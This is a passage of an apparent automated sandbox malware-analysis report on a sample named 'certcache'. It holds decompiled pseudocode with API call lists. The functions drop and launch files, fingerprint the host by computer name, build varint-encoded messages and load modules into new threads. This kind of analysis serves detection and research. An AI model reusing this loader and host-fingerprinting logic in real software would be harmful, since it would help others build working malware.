    				 *0x1ac214();
    				_t22 = GetTickCount();
    				_t2 = (_t22 & 0x00000007) + 1; // 0x1
    				L001A2270(_t67 - 0x98, _t2);
    				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
    				L001A1830(0x1a15a4, 0xc);
    				_t63 =  *(_t67 - 4);
    				_t28 = _t67 - 0x320;
    				 *0x1ac20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
    				HeapFree(GetProcessHeap(), 0, _t63);
    				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_t64 != 0xffffffff) {
    					goto 0x1b1e83;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					WriteFile();
    					CloseHandle(_t64);
    					L001A1830(0x1a1398, 4);
    					_t66 =  *(_t67 - 4);
    					 *0x1ac20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
    					HeapFree(GetProcessHeap(), 0, _t66);
    					_push(_t67 - 0x18);
    					_push( *((intOrPtr*)(_t67 + 8)));
    					if(L001A21B0(_t67 - 0x528, _t59) != 0) {
    						CloseHandle( *(_t67 - 0x18));
    						CloseHandle( *(_t67 - 0x14));
    					}
    				}
    				_push( *((intOrPtr*)(_t67 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t59);
    				return 0;
    			}
    APIs
    • GetTickCount.KERNEL32 ref: 001AA474
    • _snwprintf.NTDLL ref: 001AA4C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001AA4D3
    • HeapFree.KERNEL32(00000000), ref: 001AA4DA
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001AA4F9
    • CloseHandle.KERNEL32(?), ref: 001AA6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
    • HeapFree.KERNEL32(00000000), ref: 001AA6C0
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    APIs
    • _snwprintf.NTDLL ref: 001A9168
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9174
    • HeapFree.KERNEL32(00000000), ref: 001A917B
    • _snwprintf.NTDLL ref: 001A91AC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A91B8
    • HeapFree.KERNEL32(00000000), ref: 001A91BF
    • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001A91D0
      • Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
      • Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
      • Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
      • Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 20%
    			E001A85E1(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
    				signed char* _t28;
    				void* _t30;
    				void _t49;
    				intOrPtr _t52;
    				void* _t53;
    				signed char* _t56;
    				void* _t58;
    				intOrPtr* _t64;
    				void* _t66;
    				void* _t67;
    				void* _t69;
    
    				_t64 = __edi;
    				_t53 = __ebx;
    				L001A1830(__ecx, __edx);
    				_t56 =  *0x1ac298; // 0x0
    				_t66 =  *(_t69 + 8);
    				 *0x1ac20c(_t69 - 0xb8, 0x40, _t66, _t56[3] & 0x000000ff, _t56[2] & 0x000000ff, _t56[1] & 0x000000ff,  *_t56 & 0x000000ff);
    				HeapFree(GetProcessHeap(), 0, _t66);
    				_t28 =  *0x1ac298; // 0x0
    				_t61 = _t69 - 0xb8;
    				_push(_t56);
    				_t57 = _t69 - 0x38;
    				_push(_t28[4] & 0x0000ffff);
    				_t30 = L001A1C50(_t69 - 0x38, _t69 - 0xb8, _t64);
    				_t67 =  *(_t69 - 8);
    				if(_t30 != 0) {
    					goto 0x1b165c;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L001A1D40(_t57) != 0) {
    						goto 0x1b1674;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						if(L001A1E80(_t41, _t57, _t61) != 0) {
    							goto 0x1b168c;
    							asm("int3");
    							asm("int3");
    							if(L001A2560(_t61, _t64) != 0) {
    								_t58 =  *(_t69 - 0x10);
    								_t49 =  *_t58;
    								 *_t53 = _t49;
    								if(_t49 < 0x4000000) {
    									_push(_t53);
    									_t52 = L001A8500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
    									_t58 =  *(_t69 - 0x10);
    									 *_t64 = _t52;
    								}
    								HeapFree(GetProcessHeap(), 0, _t58);
    							}
    							HeapFree(GetProcessHeap(), ??, ??);
    						}
    						 *0x1ac260( *((intOrPtr*)(_t69 - 0x30)));
    					}
    					 *0x1ac260( *((intOrPtr*)(_t69 - 0x34)));
    					 *0x1ac260( *((intOrPtr*)(_t69 - 0x38)));
    				}
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t67);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t64 != 0x00000000;
    			}
    APIs
    • _snwprintf.NTDLL ref: 001A860C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A8618
    • HeapFree.KERNEL32(00000000), ref: 001A861F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
    • HeapFree.KERNEL32(00000000), ref: 001A86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
    • HeapFree.KERNEL32(00000000), ref: 001A8708
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 34%
    			E001A9569(signed short __edx, void* __edi, void* __esi) {
    				int _t13;
    				signed int _t20;
    				void* _t24;
    				signed short* _t26;
    				signed short _t27;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				_t27 = __edx;
    				_t24 = MapViewOfFile(??, ??, ??, ??, ??);
    				if(_t24 != 0) {
    					 *0x1acbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
    					UnmapViewOfFile(_t24);
    				}
    				CloseHandle(_t28);
    				CloseHandle(_t29);
    				 *(_t31 - 8) = 0x10;
    				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8);
    				if(_t13 != 0) {
    					_t26 = _t31 - 0x28;
    					if( *(_t31 - 0x28) != 0) {
    						goto 0x1b19f0;
    						asm("int3");
    						do {
    							_t20 =  *_t26 & 0x0000ffff;
    							if(_t20 < 0x30 || _t20 > 0x39) {
    								if(_t20 < 0x61 || _t20 > 0x7a) {
    									if(_t20 < 0x41 || _t20 > 0x5a) {
    										 *_t26 = _t27;
    									}
    								}
    							}
    							_t26 =  &(_t26[1]);
    						} while ( *_t26 != 0);
    					}
    					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t30 == 0) {
    						_t30 =  *(_t31 - 8);
    					} else {
    						goto 0x1b1a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("cmpsb");
    						asm("int3");
    						E001A1790(_t26, _t27);
    						_t32 = _t32 + 8;
    					}
    					 *0x1ac1f8(0x1ac2a8, 0x104, _t30, _t31 - 0x28,  *0x1ac3ac);
    					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
    				}
    				goto 0x1b1a1e;
    				return _t13;
    			}
    APIs
    • MapViewOfFile.KERNEL32 ref: 001A9569
    • GetFileSize.KERNEL32(?,00000000), ref: 001A9578
    • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 001A9582
    • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 001A958E
    • CloseHandle.KERNEL32 ref: 001A9595
    • CloseHandle.KERNEL32 ref: 001A959C
    • GetComputerNameW.KERNEL32(?,?), ref: 001A95B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001A9601
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A9608
    • _snprintf.NTDLL ref: 001A9642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 001A964E
    • HeapFree.KERNEL32(00000000), ref: 001A9655
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 100%
    			E001AA037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
    				unsigned int _t31;
    				unsigned int _t32;
    				long _t41;
    				signed char _t52;
    				signed char _t54;
    				signed char _t56;
    				signed char _t58;
    				signed char _t60;
    				void* _t62;
    				intOrPtr* _t63;
    				int _t65;
    				int _t66;
    				int _t67;
    				void* _t68;
    				signed char _t69;
    				signed char _t71;
    				signed char _t73;
    				signed char _t75;
    				signed char _t77;
    				void* _t79;
    				void* _t80;
    				void* _t81;
    				void* _t82;
    				int _t83;
    				signed char* _t84;
    				void* _t86;
    				char* _t89;
    				signed char* _t91;
    				signed char* _t92;
    				void* _t93;
    				char* _t94;
    				signed char* _t95;
    				void* _t96;
    				char* _t97;
    				signed char* _t98;
    				void* _t99;
    				char* _t100;
    				signed char* _t101;
    				void* _t103;
    
    				_t84 = __edi;
    				_t79 = __edx;
    				_t68 = __ecx;
    				_t62 = __ebx;
    				_t31 = __eax;
    				if(__eax > 0x7f) {
    					do {
    						_t31 = _t31 >> 7;
    						_t62 = _t62 + 1;
    					} while (_t31 > 0x7f);
    				}
    				_t32 = _t84[0x28];
    				 *((intOrPtr*)(_t103 - 4)) = 1;
    				while(_t32 > 0x7f) {
    					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
    					_t32 = _t32 >> 7;
    				}
    				_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
    				 *(_t63 + 4) = _t41;
    				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
    				 *_t63 = _t89;
    				if(_t89 != 0) {
    					 *_t89 = 8;
    					_t91 = _t89 + 1;
    					_t69 =  *_t84;
    					while(_t69 > 0x7f) {
    						_t60 = _t69;
    						_t69 = _t69 >> 7;
    						 *_t91 = _t60 | 0x00000080;
    						_t91 =  &(_t91[1]);
    					}
    					 *_t91 = _t69 & 0x0000007f;
    					_t91[1] = 0x12;
    					_t92 =  &(_t91[2]);
    					_t65 = _t84[8];
    					_t71 = _t65;
    					_t80 = _t84[4];
    					if(_t65 > 0x7f) {
    						do {
    							_t58 = _t71;
    							_t71 = _t71 >> 7;
    							 *_t92 = _t58 | 0x00000080;
    							_t92 =  &(_t92[1]);
    						} while (_t71 > 0x7f);
    					}
    					 *_t92 = _t71 & 0x0000007f;
    					_t93 =  &(_t92[1]);
    					memcpy(_t93, _t80, _t65);
    					_t94 = _t93 + _t65;
    					 *_t94 = 0x1d;
    					 *(_t94 + 1) = _t84[0xc];
    					 *((char*)(_t94 + 5)) = 0x25;
    					 *(_t94 + 6) = _t84[0x10];
    					 *((char*)(_t94 + 0xa)) = 0x2a;
    					_t95 = _t94 + 0xb;
    					_t66 = _t84[0x18];
    					_t73 = _t66;
    					_t81 = _t84[0x14];
    					if(_t66 > 0x7f) {
    						do {
    							_t56 = _t73;
    							_t73 = _t73 >> 7;
    							 *_t95 = _t56 | 0x00000080;
    							_t95 =  &(_t95[1]);
    						} while (_t73 > 0x7f);
    					}
    					 *_t95 = _t73 & 0x0000007f;
    					_t96 =  &(_t95[1]);
    					memcpy(_t96, _t81, _t66);
    					_t97 = _t96 + _t66;
    					 *_t97 = 0x32;
    					_t98 = _t97 + 1;
    					_t67 = _t84[0x20];
    					_t75 = _t67;
    					_t82 = _t84[0x1c];
    					if(_t67 > 0x7f) {
    						do {
    							_t54 = _t75;
    							_t75 = _t75 >> 7;
    							 *_t98 = _t54 | 0x00000080;
    							_t98 =  &(_t98[1]);
    						} while (_t75 > 0x7f);
    					}
    					 *_t98 = _t75 & 0x0000007f;
    					_t99 =  &(_t98[1]);
    					memcpy(_t99, _t82, _t67);
    					_t100 = _t99 + _t67;
    					 *_t100 = 0x3a;
    					_t101 = _t100 + 1;
    					_t83 = _t84[0x28];
    					_t77 = _t83;
    					_t86 = _t84[0x24];
    					if(_t83 > 0x7f) {
    						do {
    							_t52 = _t77;
    							_t77 = _t77 >> 7;
    							 *_t101 = _t52 | 0x00000080;
    							_t101 =  &(_t101[1]);
    						} while (_t77 > 0x7f);
    					}
    					 *_t101 = _t77 & 0x0000007f;
    					memcpy( &(_t101[1]), _t86, _t83);
    					_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				}
    				return 0 |  *_t63 != 0x00000000;
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000000,00000001), ref: 001AA091
    • RtlAllocateHeap.NTDLL(00000000), ref: 001AA098
    • memcpy.NTDLL(00000000,00000001,?), ref: 001AA0F8
    • memcpy.NTDLL(-0000000A,?,?), ref: 001AA148
    • memcpy.NTDLL(-00000008,?,?), ref: 001AA17C
    • memcpy.NTDLL(-00000006,?,?), ref: 001AA1B0
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    APIs
    • memset.NTDLL ref: 001A90C6
    • _snwprintf.NTDLL ref: 001A90F5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9100
    • HeapFree.KERNEL32(00000000), ref: 001A9107
    • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001A9116
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001A9128
      • Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
      • Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
      • Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
      • Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 25%
    			E001A9990() {
    				int _t10;
    				void* _t12;
    
    				memset();
    				 *(_t12 - 0x88) = 0x44;
    				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
    				_t10 = CreateProcessW(0x1ac7c0, 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
    				if(_t10 != 0) {
    					CloseHandle( *(_t12 - 0x30));
    					_t10 = CloseHandle( *(_t12 - 0x2c));
    				}
    				goto 0x1b1bae;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				return _t10;
    			}
    APIs
    • memset.NTDLL ref: 001A9990
    • CreateProcessW.KERNEL32(001AC7C0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001A99C8
    • CloseHandle.KERNEL32(?), ref: 001A99D5
    • CloseHandle.KERNEL32(?), ref: 001A99DE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    APIs
    • GetProcessHeap.KERNEL32(?,?), ref: 001A2452
    • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001A2459
    • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 001A2497
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 001A253A
    • HeapFree.KERNEL32(00000000), ref: 001A2541
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 21%
    			E001A86C5(intOrPtr* __edi) {
    				void* _t24;
    				void* _t26;
    
    				HeapFree(GetProcessHeap(), ??, ??);
    				 *0x1ac260( *((intOrPtr*)(_t26 - 0x30)));
    				 *0x1ac260( *((intOrPtr*)(_t26 - 0x34)));
    				 *0x1ac260( *((intOrPtr*)(_t26 - 0x38)));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t24);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *__edi != 0x00000000;
    			}
    APIs
    • GetProcessHeap.KERNEL32 ref: 001A86C5
    • HeapFree.KERNEL32(00000000), ref: 001A86CC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
    • HeapFree.KERNEL32(00000000), ref: 001A86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
    • HeapFree.KERNEL32(00000000), ref: 001A8708
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 35%
    			E001A8A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
    				void* _t19;
    				intOrPtr _t20;
    				signed char _t25;
    				void* _t27;
    				intOrPtr _t31;
    				void* _t32;
    				void _t34;
    				signed char _t35;
    				signed char _t38;
    				signed int _t43;
    				intOrPtr _t46;
    				signed char _t47;
    				void* _t48;
    
    				L0:
    				while(1) {
    					L0:
    					_t47 = __esi;
    					_t45 = __edi;
    					_t20 = L001A1F70(_t19, __ecx, __edx);
    					 *((intOrPtr*)(__edi + 8)) = _t20;
    					if(_t20 == 0) {
    						goto L17;
    					}
    					L11:
    					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    					 *((intOrPtr*)(__edi + 0xc)) = _t31;
    					if(_t31 == 0) {
    						L15:
    						goto 0x1b17a5;
    						asm("int3");
    						asm("int3");
    						_push( *((intOrPtr*)(_t45 + 8)));
    						L16:
    						asm("adc eax, 0x1ac178");
    						goto L17;
    					} else {
    						L12:
    						goto 0x1b1789;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("cmpsb");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						L13:
    						_t32 = CreateThread();
    						 *(__edi + 0x10) = _t32;
    						if(_t32 == 0) {
    							goto L15;
    						} else {
    							L14:
    							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
    							_t34 =  *0x1ac274; // 0x0
    							 *__edi = _t34;
    							 *0x1ac274 = __edi;
    							do {
    								L1:
    								_t46 =  *((intOrPtr*)(_t48 - 4));
    								L2:
    								_t43 = 0;
    								_t38 = 0;
    								 *(_t48 - 8) = 0;
    								_t35 = 0x80;
    								if(_t47 < _t46) {
    									while(1) {
    										L3:
    										_t35 =  *_t47;
    										_t47 = _t47 + 1;
    										_t43 = _t43 | (_t35 & 0x7f) << _t38;
    										if(_t35 >= 0) {
    											break;
    										}
    										L4:
    										_t38 = _t38 + 7;
    										if(_t47 < _t46) {
    											continue;
    										}
    										break;
    									}
    									L5:
    									 *(_t48 - 8) = _t43;
    								}
    								L6:
    								_t25 =  !((_t35 & 0x000000ff) >> 7);
    								if((_t25 & 0x00000001) != 0) {
    									L7:
    									_t25 = _t43 + _t47;
    									if(_t25 <= _t46) {
    										L8:
    										 *(_t48 - 0xc) = _t47;
    										_t47 = _t25;
    										_t25 = L001A8800(_t48 - 0xc, _t48 - 0x18);
    										if(_t25 != 0) {
    											goto L9;
    										}
    									}
    								}
    								L18:
    								goto 0x1b17ba;
    								asm("int3");
    								return _t25;
    								L9:
    								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    								_t45 = _t27;
    							} while (_t27 == 0);
    							goto 0x1b1775;
    							asm("int3");
    							continue;
    						}
    					}
    					L19:
    					L17:
    					HeapFree(GetProcessHeap(), 0, _t45);
    					goto L1;
    				}
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 001A8A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A8A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 001A8ABE
    • HeapFree.KERNEL32(00000000), ref: 001A8AC5
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 43%
    			E001A8AB4(void* __ebx, void* __edi, signed char __esi) {
    				signed char _t21;
    				intOrPtr _t27;
    				intOrPtr _t30;
    				void* _t31;
    				void _t33;
    				signed char _t36;
    				signed char _t37;
    				signed int _t41;
    				intOrPtr _t44;
    				void* _t45;
    				signed char _t46;
    				void* _t47;
    
    				L0:
    				while(1) {
    					L0:
    					_t46 = __esi;
    					asm("adc eax, 0x1ac178");
    					while(1) {
    						L17:
    						HeapFree(GetProcessHeap(), 0, _t45);
    						while(1) {
    							L1:
    							_t44 =  *((intOrPtr*)(_t47 - 4));
    							L2:
    							_t41 = 0;
    							_t37 = 0;
    							 *(_t47 - 8) = 0;
    							_t36 = 0x80;
    							if(_t46 < _t44) {
    								while(1) {
    									L3:
    									_t36 =  *_t46;
    									_t46 = _t46 + 1;
    									_t41 = _t41 | (_t36 & 0x7f) << _t37;
    									if(_t36 >= 0) {
    										break;
    									}
    									L4:
    									_t37 = _t37 + 7;
    									if(_t46 < _t44) {
    										continue;
    									}
    									break;
    								}
    								L5:
    								 *(_t47 - 8) = _t41;
    							}
    							L6:
    							_t21 =  !((_t36 & 0x000000ff) >> 7);
    							if((_t21 & 0x00000001) != 0) {
    								L7:
    								_t21 = _t41 + _t46;
    								if(_t21 <= _t44) {
    									L8:
    									 *(_t47 - 0xc) = _t46;
    									_t42 = _t47 - 0x18;
    									_t38 = _t47 - 0xc;
    									_t46 = _t21;
    									_t21 = L001A8800(_t47 - 0xc, _t47 - 0x18);
    									if(_t21 != 0) {
    										L9:
    										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    										if(_t45 == 0) {
    											L1:
    											_t44 =  *((intOrPtr*)(_t47 - 4));
    											goto L2;
    										} else {
    											L10:
    											goto 0x1b1775;
    											asm("int3");
    											L11:
    											_t27 = L001A1F70(_t23, _t38, _t42);
    											 *((intOrPtr*)(_t45 + 8)) = _t27;
    											if(_t27 == 0) {
    												L17:
    												HeapFree(GetProcessHeap(), 0, _t45);
    												continue;
    											} else {
    												L12:
    												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
    												if(_t30 == 0) {
    													L16:
    													goto 0x1b17a5;
    													asm("int3");
    													asm("int3");
    													_push( *((intOrPtr*)(_t45 + 8)));
    													goto L0;
    												} else {
    													L13:
    													goto 0x1b1789;
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("cmpsb");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													L14:
    													_t31 = CreateThread();
    													 *(_t45 + 0x10) = _t31;
    													if(_t31 == 0) {
    														goto L16;
    													} else {
    														L15:
    														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
    														_t33 =  *0x1ac274; // 0x0
    														 *_t45 = _t33;
    														 *0x1ac274 = _t45;
    														do {
    															goto L1;
    														} while (_t45 == 0);
    														goto L10;
    													}
    												}
    											}
    										}
    										L19:
    									}
    								}
    							}
    							L18:
    							goto 0x1b17ba;
    							asm("int3");
    							return _t21;
    						}
    					}
    				}
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 001A8A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A8A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 001A8ABE
    • HeapFree.KERNEL32(00000000), ref: 001A8AC5
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,001AC9C8,00000104), ref: 001A938C
    • GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001A93C6
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A93CD
    • lstrlen.KERNEL32(?), ref: 001A93F4
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 76%
    			E001A850C(intOrPtr __ecx, void* __edx, long* __edi) {
    				void* _t4;
    				void* _t9;
    				void* _t17;
    				void* _t19;
    
    				_t9 = __edx;
    				 *((intOrPtr*)(_t19 - 4)) = __ecx;
    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
    				_t17 = _t4;
    				if(_t17 == 0) {
    					L4:
    					goto 0x1b15de;
    					asm("int3");
    					return _t4;
    				} else {
    					_push(_t9);
    					_push( *((intOrPtr*)(_t19 - 4)));
    					if(L001A2DB0(_t17, __edi) == 0) {
    						_t4 = _t17;
    						goto L4;
    					} else {
    						HeapFree(GetProcessHeap(), 0, _t17);
    						return 0;
    					}
    				}
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 001A8515
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A851C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A853F
    • HeapFree.KERNEL32(00000000), ref: 001A8546
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 100%
    			E001AA7A0(long __ecx) {
    				int _t3;
    				long _t7;
    				void* _t9;
    				void* _t10;
    
    				_t10 =  *0x1acbd4; // 0x0
    				_t7 = __ecx;
    				_t9 = 0x1acbd4;
    				while(_t10 != 0) {
    					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
    					if(_t3 == 0x102) {
    						_t9 = _t10;
    					} else {
    						 *_t9 =  *_t10;
    						CloseHandle( *(_t10 + 8));
    						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
    					}
    					_t10 =  *_t9;
    				}
    				return _t3;
    			}
    APIs
